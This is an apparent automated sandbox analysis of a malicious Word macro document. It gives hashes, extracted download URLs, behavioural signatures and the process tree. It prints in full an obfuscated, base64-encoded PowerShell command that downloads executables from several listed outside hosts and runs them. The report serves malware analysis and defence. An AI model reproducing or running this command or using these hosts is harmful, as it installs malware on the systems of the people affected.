Analysis
-
max time kernel
138s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20/08/2024, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
adf9deee821ff21c72918b2509e68115_JaffaCakes118.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
adf9deee821ff21c72918b2509e68115_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
adf9deee821ff21c72918b2509e68115_JaffaCakes118.doc
-
Size
158KB
-
MD5
adf9deee821ff21c72918b2509e68115
-
SHA1
7d41723224dca99fccafa852f16d292b90753a0c
-
SHA256
6e613f281a3af3a8d773be9013d997281a8af57e592e2f7fbec463c15550304e
-
SHA512
5335ce4c36596acf4ca5c57caff8a93f8a0f9caee26f80b3660954ad657e2ec3d1ef2a02c2526184195f63102b03524978062fa7bc9777844a2923e3eaab9c55
-
SSDEEP
3072:MBHqu6dEaKR22TWTogk079THcpOu5UZivLa3PdpdOZ6i:MBKu9aKR/TX07hHcJQaadTOZ6i
Malware Config
Extracted
http://magnusdc.com/MR/
http://datummachines.com/assets/u/
http://immigrationquestion.com/3x_beast/Ty9/
http://122.117.44.59/wordpress/gS/
http://3.212.194.3/cwscwi/6u/
http://41.89.94.30/web/8/
http://srksmaisw.org/manufacturer/h/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 3956 POWeRsHeLL.exe 84 -
Blocklisted process makes network request 10 IoCs
flow pid Process 25 1632 POWeRsHeLL.exe 28 1632 POWeRsHeLL.exe 37 1632 POWeRsHeLL.exe 92 1632 POWeRsHeLL.exe 93 1632 POWeRsHeLL.exe 94 1632 POWeRsHeLL.exe 95 1632 POWeRsHeLL.exe 111 1632 POWeRsHeLL.exe 121 1632 POWeRsHeLL.exe 122 1632 POWeRsHeLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4624 WINWORD.EXE 4624 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1632 POWeRsHeLL.exe 1632 POWeRsHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1632 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE 4624 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\adf9deee821ff21c72918b2509e68115_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4624
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePOWeRsHeLL -ENCOD JABHAGcAbQB5ADMAeAByAD0AKAAoACcASgAnACsAJwB1AHEAawAnACkAKwAoACcANwBoACcAKwAnAG8AJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAHIAUAByAG8ARgBJAGwAZQBcAGEAOAA2ADIASAAxAG4AXABZAE4AUABuAFcAawBWAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAHIASQB0AGAAWQBgAFAAUgBgAG8AYABUAGAAbwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACAAdAAnACkAKwAnAGwAcwAnACsAJwAxACcAKwAoACcAMQAsACcAKwAnACAAJwApACsAKAAnAHQAbAAnACsAJwBzACcAKQApADsAJABFADYANABfAGQAegA2ACAAPQAgACgAKAAnAEoAbAA5ACcAKwAnADkAJwApACsAJwB0ACcAKwAnAGkAJwApADsAJABDAGoANQBzAHYAMABpAD0AKAAoACcAWABrACcAKwAnAHAAMQA4ACcAKQArACcAbQAnACsAJwBnACcAKQA7ACQAVgB3AGoAcAAwAG4AdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQBBADgANgAnACsAKAAnADIAaAAnACsAJwAxACcAKQArACcAbgB7ACcAKwAnADAAfQBZAG4AcABuACcAKwAnAHcAawB2AHsAMAB9ACcAKQAtAEYAWwBjAGgAQQByAF0AOQAyACkAKwAkAEUANgA0AF8AZAB6ADYAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEoAcAB1AG4AeQBrAGMAPQAoACcAVABfACcAKwAoACcAbABfAGsAbQAnACsAJwB5ACcAKQApADsAJABUAGoAdgBmAGoAYgBiAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgBUADsAJABSADAAMQB3AGYAegBnAD0AKAAoACcAaAB0AHQAcAAnACsAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAbQBhACcAKwAnAGcAJwApACsAKAAnAG4AdQAnACsAJwBzACcAKQArACcAZABjACcAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8ATQAnACsAKAAnAFIALwAqACcAKwAnAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKQArACcAZABhACcAKwAoACcAdAB1AG0AbQAnACsAJwBhACcAKwAnAGMAaABpACcAKwAnAG4AJwApACsAJwBlACcAKwAoACcAcwAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAGEAcwAnACkAKwAoACcAcwAnACsAJwBlAHQAcwAvAHUAJwApACsAKAAnAC8AKgBoACcAKwAnAHQAdABwADoALwAnACkAKwAoACcALwBpAG0AJwArACcAbQAnACsAJwBpAGcAcgBhAHQAaQBvAG4AcQAnACsAJwB1AGUAJwArACcAcwB0ACcAKwAnAGkAbwAnACsAJwBuAC4AYwBvACcAKwAnAG0ALwAzAHgAXwBiAGUAJwArACcAYQBzAHQALwAnACkAKwAnAFQAJwArACgAJwB5ADkALwAnACsAJwAqAGgAJwApACsAKAAnAHQAdABwADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwAxADIAMgAnACkAKwAoACcALgAnACsAJwAxADEANwAuADQAJwApACsAJwA0ACcAKwAnAC4AJwArACgAJwA1ADkAJwArACcALwAnACkAKwAoACcAdwBvAHIAZABwAHIAJwArACcAZQAnACsAJwBzACcAKQArACcAcwAnACsAJwAvAGcAJwArACgAJwBTAC8AKgBoAHQAJwArACcAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwAzAC4AMgAnACsAJwAxACcAKQArACcAMgAuACcAKwAoACcAMQA5ADQALgAzACcAKwAnAC8AYwAnACsAJwB3AHMAYwB3ACcAKQArACcAaQAvACcAKwAnADYAJwArACcAdQAnACsAJwAvACoAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcAA6ACcAKwAnAC8AJwArACgAJwAvADQAMQAnACsAJwAuACcAKQArACgAJwA4ADkAJwArACcALgAnACkAKwAnADkAJwArACgAJwA0ACcAKwAnAC4AMwAwAC8AdwAnACkAKwAoACcAZQBiAC8AJwArACcAOAAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAnAHQAJwArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvAHMAJwArACcAcgBrACcAKQArACcAcwAnACsAKAAnAG0AJwArACcAYQAnACsAJwBpAHMAdwAuACcAKQArACgAJwBvAHIAZwAnACsAJwAvAG0AJwArACcAYQAnACkAKwAnAG4AdQAnACsAJwBmAGEAJwArACcAYwB0ACcAKwAnAHUAcgAnACsAJwBlAHIAJwArACcALwAnACsAJwBoACcAKwAnAC8AJwApAC4AIgBzAGAAcABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEEAXwBqAHAAOQBmADgAPQAoACcARAAnACsAKAAnAF8AJwArACcAdQBhAHIAJwApACsAJwByAHIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBpAGoAOQA1AG8AXwAgAGkAbgAgACQAUgAwADEAdwBmAHoAZwApAHsAdAByAHkAewAkAFQAagB2AGYAagBiAGIALgAiAEQAYABPAHcATgBsAE8AYABBAEQAYABGAGkAbABFACIAKAAkAFUAaQBqADkANQBvAF8ALAAgACQAVgB3AGoAcAAwAG4AdgApADsAJABFAGYAdQBzAF8ANgB0AD0AKAAoACcARQBrADIAJwArACcAdgB5ACcAKQArACcAagBrACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABWAHcAagBwADAAbgB2ACkALgAiAGwARQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAxADAAMgAyACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAFYAdwBqAHAAMABuAHYAKQA7ACQATwB6ADgAZAAzAGkAaQA9ACgAKAAnAEUAaQB5ADIAJwArACcAYwAnACkAKwAnAGMAagAnACkAOwBiAHIAZQBhAGsAOwAkAE4ANABlADMAZgA2AGcAPQAoACgAJwBMACcAKwAnAGkAeQBvACcAKQArACcAbAAnACsAJwAxADcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAG8ANwA0AHUAeQBwAD0AKAAnAEkAJwArACcAXwAnACsAKAAnADQAeAA2ACcAKwAnAGIAZAAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12B
MD5f6f801e5b0502f5e803ed826dd37ae44
SHA1273e87aa518397186653443c0c3e81d574361708
SHA256e7bcd23ba708556ee69f96050dc7e74f9dab95825bfab48bcea7fd8fac482fd1
SHA5128fe0217b9c7f9331664dc4259c7924b9c7e5e145f0b795ec98d713e41a2e3d001014b3ac41071fe41447632ddbfbbefc8c7d6de8fa9faeca455a0a78575e5584
-
Filesize
63KB
MD578c3dd8dbac999ca07850f5bc67a6d70
SHA1b3e7c50d64498cd8f33d3ec1745fe9b1d891fb1c
SHA2562e33f6deda9216ae1c335fb31f7a43048fd76b6e3d23bd1000046a54737531f4
SHA5123fbe23287830b38dece680fdddc6408ace7573788ada02ab35f3fa44d0c1bf96c527d6293b57b4978db5c343a582355aa9605aa9ce13405f620e7a21bd0abafe